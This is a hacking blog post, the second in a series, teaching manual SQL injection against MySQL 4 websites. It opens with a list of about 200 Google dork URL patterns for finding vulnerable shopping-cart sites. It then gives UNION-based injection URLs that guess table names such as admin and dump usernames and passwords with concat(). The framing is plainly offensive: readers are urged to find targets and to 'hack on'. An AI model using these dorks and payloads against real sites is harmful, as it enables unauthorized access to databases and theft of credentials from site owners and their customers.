Join My Whatsapp Group to get more articles & instant updates: “https://chat.whatsapp.com/BZw74tXHXIO16slGcowZt8” (Open through Whatsapp)
To get books free on hacking & penetration testing, click here.
For any queries related to hacking, newbies who want to become pro-hackers, conatct me on twitter @hackeroyale or mail at thehackeroyale@gmail.com
This is part 2 out of a series! The next part will go into some tricks for bypassing basic security measures used against SQL injection. This tutorial is completely about MySQL version 4.
Read my previous tutorial:
How to do SQL injection without any tool TUTORIAL PART 1
+———————-+
|What are Google Dorks?|
+———————-+
Before we get into the injected part I would like to elaborate on how to find vulnerable sites. In the last tutorial I mentioned google dorking and how to check if a site is vulnerable.
FYI I will not go over finding the number of columns or using the UNION function in this tutorial. Please check the last one if you do not know what that is because it is crucial. Now… on to dorking.
Google has many hidden tools and commands within its search engine. We can use those to detect patterns in sites. The sites that come upcan be tested by us to find targets.
Below I have provided a “starter pack” or around 200 dorks:
CODE:
about.cfm?cartID=
accinfo.cfm?cartId=
acclogin.cfm?cartID=
add.cfm?bookid=
add_cart.cfm?num=
addcart.cfm?
addItem.cfm
add-to-cart.cfm?ID=
addToCart.cfm?idProduct=
addtomylist.cfm?ProdId=
adminEditProductFields.cfm?intProdID=
advSearch_h.cfm?idCategory=
affiliate.cfm?ID=
affiliate-agreement.cfm?storeid=
affiliates.cfm?id=
ancillary.cfm?ID=
archive.cfm?id=
article.cfm?id=
cfmx?PageID
basket.cfm?id=
Book.cfm?bookID=
book_list.cfm?bookid=
book_view.cfm?bookid=
BookDetails.cfm?ID=
browse.cfm?catid=
browse_item_details.cfm
Browse_Item_Details.cfm?Store_Id=
buy.cfm?
buy.cfm?bookid=
bycategory.cfm?id=
cardinfo.cfm?card=
cart.cfm?action=
cart.cfm?cart_id=
cart.cfm?id=
cart_additem.cfm?id=
cart_validate.cfm?id=
cartadd.cfm?id=
cat.cfm?iCat=
catalog.cfm
catalog.cfm?CatalogID=
catalog_item.cfm?ID=
catalog_main.cfm?catid=
category.cfm
category.cfm?catid=
category_list.cfm?id=
categorydisplay.cfm?catid=
checkout.cfm?cartid=
checkout.cfm?UserID=
checkout_confirmed.cfm?order_id=
checkout1.cfm?cartid=
comersus_listCategoriesAndProducts.cfm?idCategory=
comersus_optEmailToFriendForm.cfm?idProduct=
comersus_optReviewReadExec.cfm?idProduct=
comersus_viewItem.cfm?idProduct=
comments_form.cfm?ID=
contact.cfm?cartId=
content.cfm?id=
customerService.cfm?TextID1=
default.cfm?catID=
description.cfm?bookid=
details.cfm?BookID=
details.cfm?Press_Release_ID=
details.cfm?Product_ID=
details.cfm?Service_ID=
display_item.cfm?id=
displayproducts.cfm
downloadTrial.cfm?intProdID=
emailproduct.cfm?itemid=
emailToFriend.cfm?idProduct=
events.cfm?ID=
faq.cfm?cartID=
faq_list.cfm?id=
faqs.cfm?id=
feedback.cfm?title=
freedownload.cfm?bookid=
fullDisplay.cfm?item=
getbook.cfm?bookid=
GetItems.cfm?itemid=
giftDetail.cfm?id=
help.cfm?CartId=
home.cfm?id=
index.cfm?cart=
index.cfm?cartID=
index.cfm?ID=
info.cfm?ID=
item.cfm?eid=
item.cfm?item_id=
item.cfm?itemid=
item.cfm?model=
item.cfm?prodtype=
item.cfm?shopcd=
item_details.cfm?catid=
item_list.cfm?maingroup
item_show.cfm?code_no=
itemDesc.cfm?CartId=
itemdetail.cfm?item=
itemdetails.cfm?catalogid=
learnmore.cfm?cartID=
links.cfm?catid=
list.cfm?bookid=
List.cfm?CatID=
listcategoriesandproducts.cfm?idCategory=
modline.cfm?id=
myaccount.cfm?catid=
news.cfm?id=
order.cfm?BookID=
order.cfm?id=
order.cfm?item_ID=
OrderForm.cfm?Cart=
page.cfm?PartID=
payment.cfm?CartID=
pdetail.cfm?item_id=
powersearch.cfm?CartId=
price.cfm
privacy.cfm?cartID=
prodbycat.cfm?intCatalogID=
prodetails.cfm?prodid=
prodlist.cfm?catid=
product.cfm?bookID=
product.cfm?intProdID=
product_info.cfm?item_id=
productDetails.cfm?idProduct=
productDisplay.cfm
productinfo.cfm?item=
productlist.cfm?ViewType=Category&CategoryID=
productpage.cfm
products.cfm?ID=
products.cfm?keyword=
products_category.cfm?CategoryID=
products_detail.cfm?CategoryID=
productsByCategory.cfm?intCatalogID=
prodView.cfm?idProduct=
promo.cfm?id=
promotion.cfm?catid=
pview.cfm?Item=
resellers.cfm?idCategory=
results.cfm?cat=
savecart.cfm?CartId=
search.cfm?CartID=
searchcat.cfm?search_id=
Select_Item.cfm?id=
Services.cfm?ID=
shippinginfo.cfm?CartId=
shop.cfm?a=
shop.cfm?action=
shop.cfm?bookid=
shop.cfm?cartID=
shop_details.cfm?prodid=
shopaddtocart.cfm
shopaddtocart.cfm?catalogid=
shopbasket.cfm?bookid=
shopbycategory.cfm?catid=
shopcart.cfm?title=
shopcreatorder.cfm
shopcurrency.cfm?cid=
shopdc.cfm?bookid=
shopdisplaycategories.cfm
shopdisplayproduct.cfm?catalogid=
shopdisplayproducts.cfm
shopexd.cfm
shopexd.cfm?catalogid=
shopping_basket.cfm?cartID=
shopprojectlogin.cfm
shopquery.cfm?catalogid=
shopremoveitem.cfm?cartid=
shopreviewadd.cfm?id=
shopreviewlist.cfm?id=
ShopSearch.cfm?CategoryID=
shoptellafriend.cfm?id=
shopthanks.cfm
shopwelcome.cfm?title=
show_item.cfm?id=
show_item_details.cfm?item_id=
showbook.cfm?bookid=
showStore.cfm?catID=
shprodde.cfm?SKU=
specials.cfm?id=
store.cfm?id=
store_bycat.cfm?id=
store_listing.cfm?id=
Store_ViewProducts.cfm?Cat=
store-details.cfm?id=
storefront.cfm?id=
storefronts.cfm?title=
storeitem.cfm?item=
StoreRedirect.cfm?ID=
subcategories.cfm?id=
tek9.cfm?
template.cfm?Action=Item&pid=
topic.cfm?ID=
tuangou.cfm?bookid=
type.cfm?iType=
updatebasket.cfm?bookid=
updates.cfm?ID=
view.cfm?cid=
view_cart.cfm?title=
view_detail.cfm?ID=
viewcart.cfm?CartId=
viewCart.cfm?userID=
viewCat_h.cfm?idCategory=
viewevent.cfm?EventID=
viewitem.cfm?recor=
viewPrd.cfm?idcategory=
ViewProduct.cfm?misc=
voteList.cfm?item_ID=
whatsnew.cfm?idCategory=
WsAncillary.cfm?ID=
WsPages.cfm?ID=HP
Most of them provide shopping sites but there is a variety in that list.
+——————-+
|Injecting in MySQL4|
+——————-+
This is assuming you have used the union function and found vulnerable points. You can put in the @@version variable in one of the injection points to see the version. For example:
http://www.site.com/news.php?id=5 union all select 1,@@version,3
If it prints out 5.x.x use the last tutorial for this part. Otherwise use this one! Most websites use MySQL 5 but knowing both versions is useful!
Throughout this section we are assuming that column 2 out of 3 is injection.
In MySQL 4 there is no information_schema. We must guess the table names. This is easier than you probably think but requires more trial and error. Common table names are admin, users, usernames, etc.
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin
The code above checks if the table admin exists. If we see a 2 on the screen (or whatever injectable number) we know that locating table admin was successful. We can try this until we find a successful table.
Checking for what columns exist in a table is similar. If the injectable data shows up we know it is successful. For example:
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin
To retrieve the data is the same as MySQL 5 once we find the columns and tables:
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin
+—————–+
|That’s all folks!|
+—————–+
There you go! Injecting MySQL 4! Hope this helped and remember to check out the other tutorial!
How to do SQL injection without any tool TUTORIAL PART 3
How to do SQL injection without any tool TUTORIAL PART 4
Hack on!
HackeRoyale 
Saved as a favorite, I like your website!
LikeLiked by 1 person
Thanks frank!
LikeLike